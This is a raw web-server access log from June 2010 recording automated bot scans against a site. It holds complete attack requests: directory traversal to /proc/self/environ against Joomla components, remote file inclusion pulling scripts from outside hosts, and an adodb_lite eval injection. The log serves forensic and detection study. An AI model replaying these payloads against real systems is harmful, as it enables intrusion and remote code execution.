174.37.19.40 - - [21/Jun/2010:04:06:08 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:06:08 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:06:08 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.123.118.132 - - [21/Jun/2010:04:06:11 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:06:11 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:06:11 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
69.4.232.155 - - [21/Jun/2010:04:06:19 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
69.4.232.155 - - [21/Jun/2010:04:06:19 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.4.232.155 - - [21/Jun/2010:04:06:20 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.123.118.132 - - [21/Jun/2010:04:07:15 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:07:15 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:07:15 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
67.59.156.163 - - [21/Jun/2010:04:08:17 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:08:17 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
78.110.50.135 - - [21/Jun/2010:04:08:42 -0500] "GET /logs/access_log.1232755200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:08:42 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:08:42 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:08:50 -0500] "GET /logs/access_log.1242864000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:09:00 -0500] "GET /logs/access_log.1239408000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
69.4.232.155 - - [21/Jun/2010:04:09:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.4.232.155 - - [21/Jun/2010:04:09:01 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.4.232.155 - - [21/Jun/2010:04:09:01 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:09:20 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:09:20 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:09:20 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.110.50.135 - - [21/Jun/2010:04:09:32 -0500] "GET /logs/access_log.1229040000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:09:35 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:09:37 -0500] "GET /logs/access_log.1245283200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:09:37 -0500] "GET /logs/access_log.1244764800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
178.208.83.28 - - [21/Jun/2010:04:09:42 -0500] "GET /logs/access_log.1243468800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
178.208.83.28 - - [21/Jun/2010:04:09:42 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
178.208.83.28 - - [21/Jun/2010:04:09:42 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.110.50.135 - - [21/Jun/2010:04:09:50 -0500] "GET /logs/access_log.1242345600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:10:05 -0500] "GET /logs/access_log.1243641600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
78.110.50.135 - - [21/Jun/2010:04:10:08 -0500] "GET /logs/access_log.1243296000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.831"
193.231.187.33 - - [21/Jun/2010:04:11:22 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
193.231.187.33 - - [21/Jun/2010:04:11:22 -0500] "GET /logs/access_log.1205107200//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
193.231.187.33 - - [21/Jun/2010:04:11:22 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
193.231.187.33 - - [21/Jun/2010:04:11:42 -0500] "GET /logs/access_log.1205107200%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
174.37.19.40 - - [21/Jun/2010:04:11:53 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:11:53 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:04:11:53 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
178.208.83.28 - - [21/Jun/2010:04:19:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
178.208.83.28 - - [21/Jun/2010:04:19:15 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
178.208.83.28 - - [21/Jun/2010:04:19:15 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.43.212.56 - - [21/Jun/2010:04:19:23 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:04:19:23 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/access_log.1274572800%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/access_log.1274572800%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:27 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:29 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:29 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:29 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:58 -0500] "GET /logs/access_log.1274832000%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:23:58 -0500] "GET /logs/access_log.1274832000%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
114.108.128.56 - - [21/Jun/2010:04:31:36 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:31:38 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:31:39 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:31:40 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:31:56 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.195.112.180 - - [21/Jun/2010:04:32:09 -0500] "GET /logs/access_log.1203379200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.205.85.5 - - [21/Jun/2010:04:32:39 -0500] "GET /?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.205.85.5 - - [21/Jun/2010:04:32:42 -0500] "GET /?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
213.133.114.100 - - [21/Jun/2010:04:33:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.133.114.100 - - [21/Jun/2010:04:33:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.133.114.100 - - [21/Jun/2010:04:33:21 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
59.126.201.241 - - [21/Jun/2010:04:35:54 -0500] "GET /logs/access_log.1223164800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
59.126.201.241 - - [21/Jun/2010:04:35:58 -0500] "GET /logs/access_log.1223164800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.133.114.100 - - [21/Jun/2010:04:37:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.133.114.100 - - [21/Jun/2010:04:37:08 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.133.114.100 - - [21/Jun/2010:04:37:08 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:04:38:20 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:38:20 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:38:22 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:38:22 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.59.156.163 - - [21/Jun/2010:04:38:33 -0500] "GET /logs/access_log.1274832000/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:38:33 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:04:38:33 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.59.156.163 - - [21/Jun/2010:04:38:33 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:40:57 -0500] "GET /logs/access_log.1274832000/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:40:57 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:40:57 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.805"
75.127.98.12 - - [21/Jun/2010:04:41:25 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:41:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
114.108.128.56 - - [21/Jun/2010:04:43:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:43:56 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:43:57 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:43:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:43:58 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:43:58 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:44:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:44:03 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:44:04 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:44:14 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:44:14 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
